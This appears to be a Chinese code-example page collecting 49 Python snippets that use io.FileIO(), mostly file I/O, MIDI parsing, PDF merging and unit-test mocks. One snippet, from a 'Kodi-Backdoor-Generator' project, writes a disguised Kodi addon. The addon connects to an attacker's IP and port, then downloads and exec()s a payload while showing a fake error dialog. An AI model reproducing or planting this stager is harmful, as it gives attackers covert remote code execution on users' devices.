Python io 模块,FileIO() 实例源码

我们从Python开源项目中,提取了以下49个代码示例,用于说明如何使用io.FileIO()

项目:sqlalchemy-media    作者:pylover    | 项目源码 | 文件源码
def replace(self, attachable: [io.BytesIO, io.FileIO], position=None, **kwargs):
        """

        .. versionadded:: 0.5

        Replace the underlying file-object with a seekable one.

        :param attachable: A seekable file-object.
        :param position: Position of the new seekable file-object. if :data:`.None`, position will be preserved.
        :param kwargs: the same as the :class:`.BaseDescriptor`
        """

        if position is None:
            position = self.tell()
        # Close the old file-like object
        self.close()
        self._file = attachable

        # Some hacks are here:
        super().__init__(**kwargs)
        self.seek(position)
项目:spiderfoot    作者:wi-fi-analyzer    | 项目源码 | 文件源码
def append(self, fileobj, bookmark=None, pages=None, import_bookmarks=True):
        """
        Identical to the :meth:`merge()<merge>` method, but assumes you want to concatenate
        all pages onto the end of the file instead of specifying a position.

        :param fileobj: A File Object or an object that supports the standard read
            and seek methods similar to a File Object. Could also be a
            string representing a path to a PDF file.

        :param str bookmark: Optionally, you may specify a bookmark to be applied at
            the beginning of the included file by supplying the text of the bookmark.

        :param pages: can be a :ref:`Page Range <page-range>` or a ``(start, stop[, step])`` tuple
            to merge only the specified range of pages from the source
            document into the output document.

        :param bool import_bookmarks: You may prevent the source document's bookmarks
            from being imported by specifying this as ``False``.
        """

        self.merge(len(self.pages), fileobj, bookmark, pages, import_bookmarks)
项目:midi    作者:MicroTransactionsMatterToo    | 项目源码 | 文件源码
def __init__(self, data: Union[FileIO, BufferedReader]) -> None:
        chunk_type = data.read(4)
        if chunk_type != b'MThd':
            raise ValueError("File had invalid header chunk type")

        header_length = int.from_bytes(data.read(4), 'big')
        if header_length != 6:
            raise ValueError("File has unsupported header length")
        self.length = header_length

        format = int.from_bytes(data.read(2), 'big')
        if format not in [0, 1, 2]:
            raise ValueError("File has unsupported format")
        self.format = format

        ntrks = int.from_bytes(data.read(2), 'big')
        if ntrks > 0 and format == 0:
            raise ValueError("Multiple tracks in single track format")
        self.ntrks = ntrks

        self.tpqn = int.from_bytes(data.read(2), 'big')
项目:Kodi-Backdoor-Generator    作者:LukaSikic    | 项目源码 | 文件源码
def addonPy(ip, port):
    with io.FileIO("KodiBackdoor/addon.py", "w") as file:
        file.write('''
import xbmcaddon
import xbmcgui
import socket,struct
addon       = xbmcaddon.Addon()
addonname   = addon.getAddonInfo('name')
line1 = "Error!"
line2 = "An error occurred"
line3 = "Connection to server failed... please try again later"
s=socket.socket(2,1)
s.connect(("'''+ip+'''",'''+port+'''))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(4096)
while len(d)!=l:
    d+=s.recv(4096)
exec(d,{'s':s})
xbmcgui.Dialog().ok(addonname, line1, line2, line3)
''')

#Zip folder
项目:GoogleBot    作者:MarcoBuster    | 项目源码 | 文件源码
def download(user, file, msg):
    def startdownload(_request):
        downloader = MediaIoBaseDownload(fh, _request)
        done = False
        while not done:
            status, done = downloader.next_chunk()
            try:
                msg.edit(user.getstr('drive_downloading_progress')
                         .format(p=int(status.progress() * 100)))
            except botogram.api.APIError:
                pass

    os.chdir('/tmp')  # Sorry Windows users
    fh = io.FileIO(file.get('name'), 'wb')

    service = login(user)
    try:
        request = service.files().get_media(fileId=file.get('id'))
        startdownload(request)
        return '/tmp/' + file.get('name')
    except:
        request = service.files().export_media(fileId=file.get('id'), mimeType='application/pdf')
        startdownload(request)
        os.rename('/tmp/' + file.get('name'), '/tmp/' + file.get('name') + '.pdf')
        return '/tmp/' + file.get('name') + '.pdf'
项目:targets-python    作者:targets-fs    | 项目源码 | 文件源码
def valid_io_modes(self, *a, **kw):
        modes = set()
        t = LocalTarget(is_tmp=True)
        t.open('w').close()
        for mode in self.theoretical_io_modes(*a, **kw):
            try:
                io.FileIO(t.path, mode).close()
            except ValueError:
                pass
            except IOError as err:
                if err.errno == EEXIST:
                    modes.add(mode)
                else:
                    raise
            else:
                modes.add(mode)
        return modes
项目:deepspeech.pytorch    作者:SeanNaren    | 项目源码 | 文件源码
def create_manifest(data_path, tag, ordered=True):
    manifest_path = '%s_manifest.csv' % tag
    file_paths = []
    wav_files = [os.path.join(dirpath, f)
                 for dirpath, dirnames, files in os.walk(data_path)
                 for f in fnmatch.filter(files, '*.wav')]
    for file_path in tqdm(wav_files, total=len(wav_files)):
        file_paths.append(file_path.strip())
    print('\n')
    if ordered:
        _order_files(file_paths)
    with io.FileIO(manifest_path, "w") as file:
        for wav_path in tqdm(file_paths, total=len(file_paths)):
            transcript_path = wav_path.replace('/wav/', '/txt/').replace('.wav', '.txt')
            sample = os.path.abspath(wav_path) + ',' + os.path.abspath(transcript_path) + '\n'
            file.write(sample.encode('utf-8'))
    print('\n')
项目:gitsome    作者:donnemartin    | 项目源码 | 文件源码
def _pipe_stdin(self, stdin):
        if stdin is None or isinstance(stdin, io.FileIO):
            return None
        tsi = self._temp_stdin
        bufsize = self.bufsize
        if isinstance(stdin, io.BufferedIOBase):
            buf = stdin.read(bufsize)
            while len(buf) != 0:
                tsi.write(buf)
                tsi.flush()
                buf = stdin.read(bufsize)
        elif isinstance(stdin, (str, bytes)):
            raw = stdin.encode() if isinstance(stdin, str) else stdin
            for i in range((len(raw)//bufsize) + 1):
                tsi.write(raw[i*bufsize:(i + 1)*bufsize])
                tsi.flush()
        else:
            raise ValueError('stdin not understood {0!r}'.format(stdin))
项目:AsyncDB    作者:JimChengLin    | 项目源码 | 文件源码
def load(self, file: FileIO):
        self.ptr = file.tell()
        self.is_leaf, self.keys = load(file)

        ptr_num = len(self.keys)
        if not self.is_leaf:
            ptr_num += (ptr_num + 1)
        ptrs = unpack('Q' * ptr_num, file.read(8 * ptr_num))

        if self.is_leaf:
            self.ptrs_value = list(ptrs)
        else:
            ptr_num //= 2
            self.ptrs_value = list(ptrs[:ptr_num])
            self.ptrs_child = list(ptrs[ptr_num:])
        self.size = file.tell() - self.ptr
项目:charm-helpers    作者:juju    | 项目源码 | 文件源码
def test_create(self, mock_open):
        """Test create sysctl method"""
        _file = MagicMock(spec=io.FileIO)
        mock_open.return_value = _file

        create('{"kernel.max_pid": 1337}', "/etc/sysctl.d/test-sysctl.conf")

        _file.__enter__().write.assert_called_with("kernel.max_pid=1337\n")

        self.log.assert_called_with(
            "Updating sysctl_file: /etc/sysctl.d/test-sysctl.conf"
            " values: {'kernel.max_pid': 1337}",
            level='DEBUG')

        self.check_call.assert_called_with([
            "sysctl", "-p",
            "/etc/sysctl.d/test-sysctl.conf"])
项目:charm-helpers    作者:juju    | 项目源码 | 文件源码
def test_configure_install_source_distro_proposed(
            self, _spcc, _open, _lsb):
        """Test configuring installation source from deb repo url"""
        _lsb.return_value = FAKE_RELEASE
        _file = MagicMock(spec=io.FileIO)
        _open.return_value = _file
        openstack.configure_installation_source('distro-proposed')
        _file.__enter__().write.assert_called_once_with(
            '# Proposed\ndeb http://archive.ubuntu.com/ubuntu '
            'precise-proposed main universe multiverse restricted\n')
        src = ('deb http://archive.ubuntu.com/ubuntu/ precise-proposed '
               'restricted main multiverse universe')
        openstack.configure_installation_source(src)
        _spcc.assert_called_once_with(
            ['add-apt-repository', '--yes',
             'deb http://archive.ubuntu.com/ubuntu/ precise-proposed '
             'restricted main multiverse universe'])
项目:charm-helpers    作者:juju    | 项目源码 | 文件源码
def test_configure_install_source_uca_repos(
            self, _fip, _lsb, _install, _open):
        """Test configuring installation source from UCA sources"""
        _lsb.return_value = FAKE_RELEASE
        _file = MagicMock(spec=io.FileIO)
        _open.return_value = _file
        _fip.side_effect = lambda x: x
        for src, url in UCA_SOURCES:
            actual_url = "# Ubuntu Cloud Archive\n{}\n".format(url)
            openstack.configure_installation_source(src)
            _install.assert_called_with(['ubuntu-cloud-keyring'],
                                        fatal=True)
            _open.assert_called_with(
                '/etc/apt/sources.list.d/cloud-archive.list',
                'w'
            )
            _file.__enter__().write.assert_called_with(actual_url)
项目:charm-helpers    作者:juju    | 项目源码 | 文件源码
def test_save_scriptrc(self, _open, _charm_dir, _exists, _mkdir):
        """Test generation of scriptrc from environment"""
        scriptrc = ['#!/bin/bash\n',
                    'export setting1=foo\n',
                    'export setting2=bar\n']
        _file = MagicMock(spec=io.FileIO)
        _open.return_value = _file
        _charm_dir.return_value = '/var/lib/juju/units/testing-foo-0/charm'
        _exists.return_value = False
        os.environ['JUJU_UNIT_NAME'] = 'testing-foo/0'
        openstack.save_script_rc(setting1='foo', setting2='bar')
        rcdir = '/var/lib/juju/units/testing-foo-0/charm/scripts'
        _mkdir.assert_called_with(rcdir)
        expected_f = '/var/lib/juju/units/testing-foo-0/charm/scripts/scriptrc'
        _open.assert_called_with(expected_f, 'wt')
        _mkdir.assert_called_with(os.path.dirname(expected_f))
        _file.__enter__().write.assert_has_calls(
            list(call(line) for line in scriptrc), any_order=True)
项目:charm-helpers    作者:juju    | 项目源码 | 文件源码
def test_configure_install_source_uca_repos(
            self, _fip, _lsb, _install, _open):
        """Test configuring installation source from UCA sources"""
        _lsb.return_value = FAKE_RELEASE
        _file = MagicMock(spec=io.FileIO)
        _open.return_value = _file
        _fip.side_effect = lambda x: x
        for src, url in UCA_SOURCES:
            actual_url = "# Ubuntu Cloud Archive\n{}\n".format(url)
            fetch.add_source(src)
            _install.assert_called_with(['ubuntu-cloud-keyring'],
                                        fatal=True)
            _open.assert_called_with(
                '/etc/apt/sources.list.d/cloud-archive.list',
                'w'
            )
            _file.__enter__().write.assert_called_with(actual_url)
项目:make_dataset    作者:hyzhan    | 项目源码 | 文件源码
def create_manifest(data_path, tag, ordered=True):
    manifest_path = '%s_manifest.csv' % tag
    file_paths = []
    wav_files = [os.path.join(dirpath, f)
                 for dirpath, dirnames, files in os.walk(data_path)
                 for f in fnmatch.filter(files, '*.wav')]
    size = len(wav_files)
    counter = 0
    for file_path in wav_files:
        file_paths.append(file_path.strip())
        counter += 1
        update_progress(counter / float(size))
    print('\n')
    if ordered:
        _order_files(file_paths)
    counter = 0
    with io.FileIO(manifest_path, "w") as file:
        for wav_path in file_paths:
            transcript_path = wav_path.replace('/wav/', '/txt/').replace('.wav', '.txt')
            sample = os.path.abspath(wav_path) + ',' + os.path.abspath(transcript_path) + '\n'
            file.write(sample.encode('utf-8'))
            counter += 1
            update_progress(counter / float(size))
    print('\n')
项目:make_dataset    作者:hyzhan    | 项目源码 | 文件源码
def create_manifest(data_path, tag, ordered=True):
    manifest_path = '%s_manifest.csv' % tag
    file_paths = []
    wav_files = [os.path.join(dirpath, f)
                 for dirpath, dirnames, files in os.walk(data_path)
                 for f in fnmatch.filter(files, '*.wav')]
    size = len(wav_files)
    counter = 0
    for file_path in wav_files:
        file_paths.append(file_path.strip())
        counter += 1
        update_progress(counter / float(size))
    print('\n')
    if ordered:
        _order_files(file_paths)
    counter = 0
    with io.FileIO(manifest_path, "w") as file:
        for wav_path in file_paths:
            transcript_path = wav_path.replace('/wav/', '/txt/').replace('.wav', '.txt')
            sample = os.path.abspath(wav_path) + ',' + os.path.abspath(transcript_path) + '\n'
            file.write(sample.encode('utf-8'))
            counter += 1
            update_progress(counter / float(size))
    print('\n')
项目:make_dataset    作者:hyzhan    | 项目源码 | 文件源码
def create_manifest(data_path, tag, ordered=True):
    manifest_path = '%s_manifest.csv' % tag
    file_paths = []
    wav_files = [os.path.join(dirpath, f)
                 for dirpath, dirnames, files in os.walk(data_path)
                 for f in fnmatch.filter(files, '*.wav')]
    size = len(wav_files)
    counter = 0
    for file_path in wav_files:
        file_paths.append(file_path.strip())
        counter += 1
        update_progress(counter / float(size))
    print('\n')
    if ordered:
        _order_files(file_paths)
    counter = 0
    with io.FileIO(manifest_path, "w") as file:
        for wav_path in file_paths:
            transcript_path = wav_path.replace('/wav/', '/txt/').replace('.wav', '.txt')
            sample = os.path.abspath(wav_path) + ',' + os.path.abspath(transcript_path) + '\n'
            file.write(sample.encode('utf-8'))
            counter += 1
            update_progress(counter / float(size))
    print('\n')
项目:SmartSocks    作者:waylybaye    | 项目源码 | 文件源码
def __init__(self, **kwargs):
            buf = FileIO(sys.stdout.fileno(), 'w')
            super(_Py3Utf8Stdout, self).__init__(
                buf,
                encoding='utf8',
                errors='strict'
            )
项目:easy-jupyter    作者:openebs    | 项目源码 | 文件源码
def download(url, file_name):
    """
    function to download file over http
    url : URL of file to be downloaded
    file_name : File name
    """
    with io.FileIO(file_name, "w") as file:
        # get request
        response = get(url)
        # write to file
        file.write(response.content)
项目:radar    作者:amoose136    | 项目源码 | 文件源码
def isfileobj(f):
        return isinstance(f, (io.FileIO, io.BufferedReader, io.BufferedWriter))
项目:filefinder2    作者:asmodehn    | 项目源码 | 文件源码
def get_data(self, path):
            """Return the data from path as raw bytes."""
            with io.FileIO(path, 'r') as file:
                return file.read()

    # inspired from importlib2
项目:spiderfoot    作者:wi-fi-analyzer    | 项目源码 | 文件源码
def write(self, fileobj):
        """
        Writes all data that has been merged to the given output file.

        :param fileobj: Output file. Can be a filename or any kind of
            file-like object.
        """
        my_file = False
        if isString(fileobj):
            fileobj = file(fileobj, 'wb')
            my_file = True

        # Add pages to the PdfFileWriter
        # The commented out line below was replaced with the two lines below it to allow PdfFileMerger to work with PyPdf 1.13
        for page in self.pages:
            self.output.addPage(page.pagedata)
            page.out_pagedata = self.output.getReference(self.output._pages.getObject()["/Kids"][-1].getObject())
            #idnum = self.output._objects.index(self.output._pages.getObject()["/Kids"][-1].getObject()) + 1
            #page.out_pagedata = IndirectObject(idnum, 0, self.output)

        # Once all pages are added, create bookmarks to point at those pages
        self._write_dests()
        self._write_bookmarks()

        # Write the output to the file
        self.output.write(fileobj)

        if my_file:
            fileobj.close()
项目:spiderfoot    作者:wi-fi-analyzer    | 项目源码 | 文件源码
def close(self):
        """
        Shuts all file descriptors (input and output) and clears all memory
        usage.
        """
        self.pages = []
        for fo, pdfr, mine in self.inputs:
            if mine:
                fo.close()

        self.inputs = []
        self.output = None
项目:spiderfoot    作者:wi-fi-analyzer    | 项目源码 | 文件源码
def addBookmark(self, title, pagenum, parent=None):
        """
        Add a bookmark to this PDF file.

        :param str title: Title to use for this bookmark.
        :param int pagenum: Page number this bookmark will point to.
        :param parent: A reference to a parent bookmark to create nested
            bookmarks.
        """
        if parent == None:
            iloc = [len(self.bookmarks)-1]
        elif isinstance(parent, list):
            iloc = parent
        else:
            iloc = self.findBookmark(parent)

        dest = Bookmark(TextStringObject(title), NumberObject(pagenum), NameObject('/FitH'), NumberObject(826))

        if parent == None:
            self.bookmarks.append(dest)
        else:
            bmparent = self.bookmarks
            for i in iloc[:-1]:
                bmparent = bmparent[i]
            npos = iloc[-1]+1
            if npos < len(bmparent) and isinstance(bmparent[npos], list):
                bmparent[npos].append(dest)
            else:
                bmparent.insert(npos, [dest])
        return dest
项目:cheribuild    作者:CTSRD-CHERI    | 项目源码 | 文件源码
def __runProcessWithFilteredOutput(self, proc: subprocess.Popen, logfile: "typing.Optional[io.FileIO]",
                                       stdoutFilter: "typing.Callable[[bytes], None]", cmdStr: str):
        logfileLock = threading.Lock()  # we need a mutex so the logfile line buffer doesn't get messed up
        stderrThread = None
        if logfile:
            # use a thread to print stderr output and write it to logfile (not using a thread would block)
            stderrThread = threading.Thread(target=self._handleStdErr, args=(logfile, proc.stderr, logfileLock, self))
            stderrThread.start()
        for line in proc.stdout:
            with logfileLock:  # make sure we don't interleave stdout and stderr lines
                if logfile:
                    logfile.write(line)
                if stdoutFilter:
                    stdoutFilter(line)
                else:
                    sys.stdout.buffer.write(line)
                    flushStdio(sys.stdout)
        retcode = proc.wait()
        if stderrThread:
            stderrThread.join()
        # Not sure if the remaining call is needed
        remainingErr, remainingOut = proc.communicate()
        if remainingErr:
            print("Process had remaining stderr:", remainingErr)
            sys.stderr.buffer.write(remainingErr)
            if logfile:
                logfile.write(remainingOut)
        if remainingOut:
            print("Process had remaining stdout:", remainingOut)
            sys.stdout.buffer.write(remainingOut)
            if logfile:
                logfile.write(remainingErr)
        if stdoutFilter and self._lastStdoutLineCanBeOverwritten:
            # add the final new line after the filtering
            sys.stdout.buffer.write(b"\n")
        if retcode:
            message = "Command \"%s\" failed with exit code %d.\n" % (cmdStr, retcode)
            if logfile:
                message += "See " + logfile.name + " for details."
            raise SystemExit(message)
项目:charm-nova-compute    作者:openstack    | 项目源码 | 文件源码
def patch_open():
    '''Patch open() to allow mocking both open() itself and the file that is
    yielded.

    Yields the mock for "open" and "file", respectively.'''
    mock_open = MagicMock(spec='builtins.open')
    mock_file = MagicMock(spec=io.FileIO)

    @contextmanager
    def stub_open(*args, **kwargs):
        mock_open(*args, **kwargs)
        yield mock_file

    with patch('builtins.open', stub_open):
        yield mock_open, mock_file
项目:midi    作者:MicroTransactionsMatterToo    | 项目源码 | 文件源码
def sequence_number(data: Union[FileIO, BufferedReader]) -> Tuple[int, int, bytearray]:
    length_bytes = bytearray(data.read(4))
    length = int.from_bytes(length_bytes, "big")
    if length != 2:
        raise EventLengthError("Sequence Number length was incorrect. It should be 2, but it was {}".format(length))
    sequence_num_raw = bytearray(data.read(2))
    sequence_num = int.from_bytes(sequence_num_raw, "big")
    return length, sequence_num, sequence_num_raw
项目:midi    作者:MicroTransactionsMatterToo    | 项目源码 | 文件源码
def text_event(data: Union[FileIO, BufferedReader]) -> Tuple[int, str, bytearray]:
    length = VariableLengthValue(data).value
    raw_data = bytearray(data.read(length))
    try:
        text = raw_data.decode("ASCII")
    except UnicodeDecodeError as exc:
        raise EventTextError("Unparsable text in text event") from exc

    return length, text, raw_data
项目:midi    作者:MicroTransactionsMatterToo    | 项目源码 | 文件源码
def copyright_notice(data: Union[FileIO, BufferedReader]) -> Tuple[int, str, bytearray]:
    length = VariableLengthValue(data).value
    raw_data = bytearray(data.read(length))
    try:
        text = raw_data.decode("ASCII")
    except UnicodeDecodeError as exc:
        raise EventTextError("Unparsable text in copyright notice") from exc

    return length, text, raw_data
项目:midi    作者:MicroTransactionsMatterToo    | 项目源码 | 文件源码
def chunk_name(data: Union[FileIO, BufferedReader]) -> Tuple[int, str, bytearray]:
    length = VariableLengthValue(data).value
    raw_data = bytearray(data.read(length))
    try:
        text = raw_data.decode("ASCII")
    except UnicodeDecodeError as exc:
        raise EventTextError("Unparsable text in track/sequence name") from exc

    return length, text, raw_data
项目:midi    作者:MicroTransactionsMatterToo    | 项目源码 | 文件源码
def instrument_name(data: Union[FileIO, BufferedReader]) -> Tuple[int, str, bytearray]:
    length = VariableLengthValue(data).value
    raw_data = bytearray(data.read(length))
    try:
        text = raw_data.decode("ASCII")
    except UnicodeDecodeError as exc:
        raise EventTextError("Unparsable text in instrument name") from exc

    return length, text, raw_data
项目:midi    作者:MicroTransactionsMatterToo    | 项目源码 | 文件源码
def marker(data: Union[FileIO, BufferedReader]) -> Tuple[int, str, bytearray]:
    length = VariableLengthValue(data).value
    raw_data = bytearray(data.read(length))
    try:
        text = raw_data.decode("ASCII")
    except UnicodeDecodeError as exc:
        raise EventTextError("Unparseable text in marker text") from exc

    return length, text, raw_data
项目:midi    作者:MicroTransactionsMatterToo    | 项目源码 | 文件源码
def cue_point(data: Union[FileIO, BufferedReader]) -> Tuple[int, str, bytearray]:
    length = VariableLengthValue(data).value
    raw_data = bytearray(data.read(length))
    try:
        text = raw_data.decode("ASCII")
    except UnicodeDecodeError as exc:
        raise EventTextError("Unparseable text in Cue Point text") from exc

    return length, text, raw_data
项目:midi    作者:MicroTransactionsMatterToo    | 项目源码 | 文件源码
def channel_prefix(data: Union[FileIO, BufferedReader]) -> Tuple[int, int, bytearray]:
    length_bytes = data.read(4)
    length = int.from_bytes(length_bytes, "big")
    if length != 0x01:
        raise EventLengthError("Channel Prefix length invalid. It should be 1, but it's {}".format(length))
    prefix_raw = bytearray(data.read(1))
    prefix = int.from_bytes(prefix_raw, "big")

    return length, prefix, prefix_raw
项目:midi    作者:MicroTransactionsMatterToo    | 项目源码 | 文件源码
def end_of_track(data: Union[FileIO, BufferedReader]) -> Tuple[int, None, None]:
    length_bytes = data.read(4)
    length = int.from_bytes(length_bytes, "big")
    if length != 0:
        raise EventLengthError("End of Track event with non-zero length")
    return length, None, None
项目:midi    作者:MicroTransactionsMatterToo    | 项目源码 | 文件源码
def set_tempo(data: Union[FileIO, BufferedReader]) -> Tuple[int, int, bytearray]:
    length_bytes = data.read(4)
    length = int.from_bytes(length_bytes, "big")
    if length != 3:
        raise EventLengthError("Set Tempo event with length other than 3. Given length was {}".format(length))
    raw_data = bytearray(data.read(3))
    tpqm = int.from_bytes(raw_data, "big")

    return length, tpqm, raw_data
项目:midi    作者:MicroTransactionsMatterToo    | 项目源码 | 文件源码
def time_signature(data: Union[FileIO, BufferedReader]) -> Tuple[int, Tuple[int, int, int, int], bytearray]:
    length_bytes = bytearray(data.read(1))
    length = int.from_bytes(length_bytes, "big")

    if length != 0x04:
        raise EventLengthError("Time Signature event has invalid length. Should be 4, value was {}".format(length))

    data_bytes = bytearray(data.read(4))  # type: bytearray
    numerator = data_bytes[0]  # type: int
    denominator = data_bytes[1]  # type: int
    clock_num = data_bytes[2]
    ts_number = data_bytes[3]

    return length, (numerator, denominator, clock_num, ts_number), data_bytes
项目:midi    作者:MicroTransactionsMatterToo    | 项目源码 | 文件源码
def key_signature(data: Union[FileIO, BufferedReader]) -> Tuple[int, Tuple[int, int], bytearray]:
    length_bytes = bytearray(data.read(1))
    length = int.from_bytes(length_bytes, "big")

    if length != 0x02:
        raise EventLengthError("Key Signature event has invalid length. Should be 2, value was {}".format(length))

    data_bytes = bytearray(data.read(2))
    signature_index = data_bytes[0]
    minor_major = data_bytes[1]

    return length, (signature_index, minor_major), data_bytes
项目:midi    作者:MicroTransactionsMatterToo    | 项目源码 | 文件源码
def __init__(self, data: Union[FileIO, BufferedReader]) -> None:
        chunk_name = data.read(4)
        if chunk_name != b'MTrk':
            raise ValueError("Track Chunk header invalid")

        self.length = int.from_bytes(data.read(4), 'big')
项目:midi    作者:MicroTransactionsMatterToo    | 项目源码 | 文件源码
def _parse(self, data: Union[FileIO, BufferedReader]):
        delta_time = VariableLengthValue(data)
项目:charm-neutron-api    作者:openstack    | 项目源码 | 文件源码
def patch_open():
    '''Patch open() to allow mocking both open() itself and the file that is
    yielded.

    Yields the mock for "open" and "file", respectively.'''
    mock_open = MagicMock(spec=open)
    mock_file = MagicMock(spec=io.FileIO)

    @contextmanager
    def stub_open(*args, **kwargs):
        mock_open(*args, **kwargs)
        yield mock_file

    with patch('builtins.open', stub_open):
        yield mock_open, mock_file
项目:charm-neutron-openvswitch    作者:openstack    | 项目源码 | 文件源码
def patch_open():
    '''Patch open() to allow mocking both open() itself and the file that is
    yielded.

    Yields the mock for "open" and "file", respectively.'''
    mock_open = MagicMock(spec=open)
    mock_file = MagicMock(spec=io.FileIO)

    @contextmanager
    def stub_open(*args, **kwargs):
        mock_open(*args, **kwargs)
        yield mock_file

    with patch('builtins.open', stub_open):
        yield mock_open, mock_file
项目:py_custom_vision_client    作者:CatalystCode    | 项目源码 | 文件源码
def _format_files(cls, *fobjs: FileIO) -> List[HttpFile]:
        files = []
        for fobj in fobjs:
            filename = basename(fobj.name)
            extension = splitext(filename)[1]
            content_type = 'application/{}'.format(extension)
            files.append(('file', (filename, fobj, content_type)))
        return files
项目:Trity    作者:toxic-ig    | 项目源码 | 文件源码
def clone():
    print (''+T+'Remember to put https:// in front of the website!')
    hey = raw_input(''+T+'' + color.UNDERLINE + 'Website>' + color.END)
    response = urllib2.urlopen(hey)
    page_source = response.read()

    with io.FileIO("websitesource.html", "w") as file:
        file.write(page_source)
    print (''+G+'[*] Finished!')
项目:krpcScripts    作者:jwvanderbeck    | 项目源码 | 文件源码
def isfileobj(f):
        return isinstance(f, (io.FileIO, io.BufferedReader, io.BufferedWriter))
项目:packaging    作者:blockstack    | 项目源码 | 文件源码
def isfileobj(f):
        return isinstance(f, io.FileIO)
项目:packaging    作者:blockstack    | 项目源码 | 文件源码
def isfileobj(f):
        return isinstance(f, (io.FileIO, io.BufferedReader))
项目:packaging    作者:blockstack    | 项目源码 | 文件源码
def isfile(f):
        if isinstance(f, io.FileIO):
            return True
        elif hasattr(f, 'buffer'):
            return isfile(f.buffer)
        elif hasattr(f, 'raw'):
            return isfile(f.raw)
        return False
项目:LetItRain-475-2161_Good_Rodgers    作者:ForensicTools    | 项目源码 | 文件源码
def download_revisions(httpauth, service, fileID, title, path, counter, log_file):
    if not os.path.exists(path + "/" + title):
        os.makedirs(path + "/" + title)
    url = "https://www.googleapis.com/drive/v3/files/" + fileID + "/revisions"
    resp, content = httpauth.request(url, 'GET')
    revisions = json.loads(content.decode('utf-8'))
    revision_info = []
    rev_num = 1
    for revision in revisions["revisions"]:
        revision_info.append([str(rev_num), revision["id"], revision["modifiedTime"]])
        file_path = path + "/" + title + "/" + title + ".rev" + str(rev_num)
        orig_title = str(title)
        # to prevent duplicate file names being saved
        if os.path.exists(file_path):
            file_path, title = get_new_file_name(file_path)
            log_and_print(log_file, counter + " File named '" + orig_title + "' already exists. Saving as '" + title + "' instead.")
        log_and_print(log_file, counter + " Downloading '" + title + ".rev" + str(rev_num) + "'...")
        request = service.revisions().get_media(fileId=fileID, revisionId=revision["id"])
        fh = io.FileIO(file_path, mode='wb')
        downloader = MediaIoBaseDownload(fh, request)
        done = False
        while done is False:
            status, done = downloader.next_chunk()
            # Print status of download (mainly for larger files)
            print("%d%%\r" % int(status.progress() * 100), end="", flush=True)
        fh.close()
        log_and_print(log_file, counter + " Hashing '" + title + ".rev" + str(rev_num) + "'...")
        with open(path + "/_hashes.txt", "a") as hashes_file:
            hashes_file.write(title + ".rev" + str(rev_num) + "\n")
            hashes_file.write("--MD5: " + hash_file(file_path, "md5") + "\n")
            hashes_file.write("--SHA1: " + hash_file(file_path, "sha1") + "\n")
            hashes_file.write("--SHA256: " + hash_file(file_path, "sha256") + "\n")
        rev_num += 1
    log_and_print(log_file, counter + " Writing revision info for '" + title + "'...")
    with open(path + "/" + title + "/" + title + "_revisions.txt", "w") as saved_file:
        for item in revision_info:
            saved_file.write("Revision Number: " + item[0] + "\n")
            saved_file.write("--Revision ID: " + item[1] + "\n")
            saved_file.write("--Revision Last Modifed: " + item[2] + "\n")

# Check if there are revisions for a given fileID